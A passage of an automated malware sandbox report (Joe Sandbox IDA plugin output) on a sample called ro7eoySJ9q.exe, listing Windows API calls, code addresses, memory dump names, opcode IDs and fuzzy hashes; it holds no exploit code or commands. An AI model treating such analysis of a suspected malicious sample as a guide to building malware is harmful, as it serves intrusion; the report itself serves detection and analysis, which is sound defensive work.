                                                                      • Instruction Fuzzy Hash: 4011A371910205EFDB10CFA0D6585AE77B4EF44355F20843FE042A72C0D6B84A85DB1A
                                                                      APIs
                                                                      • GetFileVersionInfoSizeW.KERNELBASE(00000000,?,000000EE), ref: 00401F17
                                                                      • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401F39
                                                                        • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileGlobalInfoSizeVersionwsprintf
                                                                      • String ID:
                                                                      • API String ID: 1691843260-0
                                                                      • Opcode ID: 3e36e6059fa465f8b0de5d4d74652fe28b5c7b8050137b23430cd001ac3cf941
                                                                      • Instruction ID: 8ab53c93760d54e15c8d206721566b5ff93d1c6769f111ab103972edef9fb44c
                                                                      • Opcode Fuzzy Hash: 3e36e6059fa465f8b0de5d4d74652fe28b5c7b8050137b23430cd001ac3cf941
                                                                      • Instruction Fuzzy Hash: B8114871A00109BFDB01DFA5CD44CAEBBB9EF44354F10407AF901E62E1E7789A50DB68
                                                                      APIs
                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                                      • Instruction ID: adb52dfa00387397cd87161f5118bdb5a91708942fcdcec178a456792abf2482
                                                                      • Opcode Fuzzy Hash: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                                      • Instruction Fuzzy Hash: 5101F4316202209BE7095B389D09B6A76D8E711719F10863FF851F72F1D6B8CC429B4C
                                                                      APIs
                                                                      • OleInitialize.OLE32(00000000), ref: 004050DD
                                                                        • Part of subcall function 00403FE1: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                                      • CoUninitialize.COMBASE(00000404,00000000), ref: 00405129
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeMessageSendUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2896919175-0
                                                                      • Opcode ID: 10ef6d87f3fd7bea8bde0a3b6e3cee34a91868ef9ffca7f293b6e213662e1e0e
                                                                      • Instruction ID: cb2347d6cbc19b0f628d54f49591885684dc807da670f32007c6c40ab910fdb0
                                                                      • Opcode Fuzzy Hash: 10ef6d87f3fd7bea8bde0a3b6e3cee34a91868ef9ffca7f293b6e213662e1e0e
                                                                      • Instruction Fuzzy Hash: A8F024339006008BD3016BA1AD02B977764FBC4306F09403AEE44762E1DBB658018B5D
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\ro7eoySJ9q.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCreate
                                                                      • String ID:
                                                                      • API String ID: 415043291-0
                                                                      • Opcode ID: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                                      • Instruction ID: 1eb9dddf645dfc1e42ea27fadde30db719d7f554b9b2fef872a17e27e5e15d7e
                                                                      • Opcode Fuzzy Hash: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                                      • Instruction Fuzzy Hash: C0D09E71654601EFEF098F20DE16F6EBBA2EB84B00F11952DB692940E0DA7158199B15
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,?,00405599,?,?,00000000,00405785,?,?,?,?), ref: 004059AF
                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 004059C3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
                                                                      • Instruction ID: 5089437a0038f9672fdec650e2f42df5ceafcb3a9c98f83db2fa6512ef2061e4
                                                                      • Opcode Fuzzy Hash: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
                                                                      • Instruction Fuzzy Hash: 09D012B2504520EFC2103728EF0C89BBF65DB543717028B35FDB5A22F0CB304C568A99
                                                                      APIs
                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402288
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileStringWrite
                                                                      • String ID:
                                                                      • API String ID: 390214022-0
                                                                      • Opcode ID: 45cd240e89cb35acd2adb5c5489ef0982fec4b8f4934da7d4fbc5eb992d52d3a
                                                                      • Instruction ID: 0b657d416b15e43c0193b3f865d343ab07691dd64d9d569c69532df3a91b5b61
                                                                      • Opcode Fuzzy Hash: 45cd240e89cb35acd2adb5c5489ef0982fec4b8f4934da7d4fbc5eb992d52d3a
                                                                      • Instruction Fuzzy Hash: 82E0BF32A045696ADB2036F20E8D97F30589B54754F15057FB513BA1C2DDFC0D815AAD
                                                                      APIs
                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F8B,000000FF,00000004,00000000,00000000,00000000), ref: 00403177
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 233ad9278b8c44b78323ef9ef70cff2e7f1b2f0f6aab1e28ab7980f1b25ba47d
                                                                      • Instruction ID: 71aeb53177ba50d05d0cf1bc79962ee68b95cc51097d41dc468827112562ad25
                                                                      • Opcode Fuzzy Hash: 233ad9278b8c44b78323ef9ef70cff2e7f1b2f0f6aab1e28ab7980f1b25ba47d
                                                                      • Instruction Fuzzy Hash: 88E08C32114218BBCF205FA19C04AE73F5CEB093A2F00C03ABD18E9290D234DA15DBE8
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
                                                                      • Instruction ID: 3dbf039cb61568b40e8fd4d19fef357c16506d2f59f835c7eaccd1bdbf02c8de
                                                                      • Opcode Fuzzy Hash: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
                                                                      • Instruction Fuzzy Hash: A3E04676290108AFDB00EFA4EE4AFD93BECAB08704F008021B609E6091DA74F5408B6C
                                                                      APIs
                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileString
                                                                      • String ID:
                                                                      • API String ID: 1096422788-0
                                                                      • Opcode ID: 74d14b167e5f6999f806f0de9605a955cbc6b2f8afcacdbae3200fcd2487e3c0
                                                                      • Instruction ID: 032603440061492facc866799902dc36791b8dee2dcfc8dfbdbcdfe83c4889f9
                                                                      • Opcode Fuzzy Hash: 74d14b167e5f6999f806f0de9605a955cbc6b2f8afcacdbae3200fcd2487e3c0
                                                                      • Instruction Fuzzy Hash: FCE0BF71940208BADB10AFA1CD49AED3A68EF01754F10443AF552BB0D1EAF995C1AB59
                                                                      APIs
                                                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: e8bb238b6c1997d302efcbd6551df5b11c37b88c8e9cb2d5373f431501d37c19
                                                                      • Instruction ID: 561d33903432245b5a5ec808ba248510e0ad320ee7677a05499f6c71c576feb8
                                                                      • Opcode Fuzzy Hash: e8bb238b6c1997d302efcbd6551df5b11c37b88c8e9cb2d5373f431501d37c19
                                                                      • Instruction Fuzzy Hash: 54D01772704112DBCB10EBE9AA0869D7AA49B41369F204537D212F21D0D6B89585AB2E
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
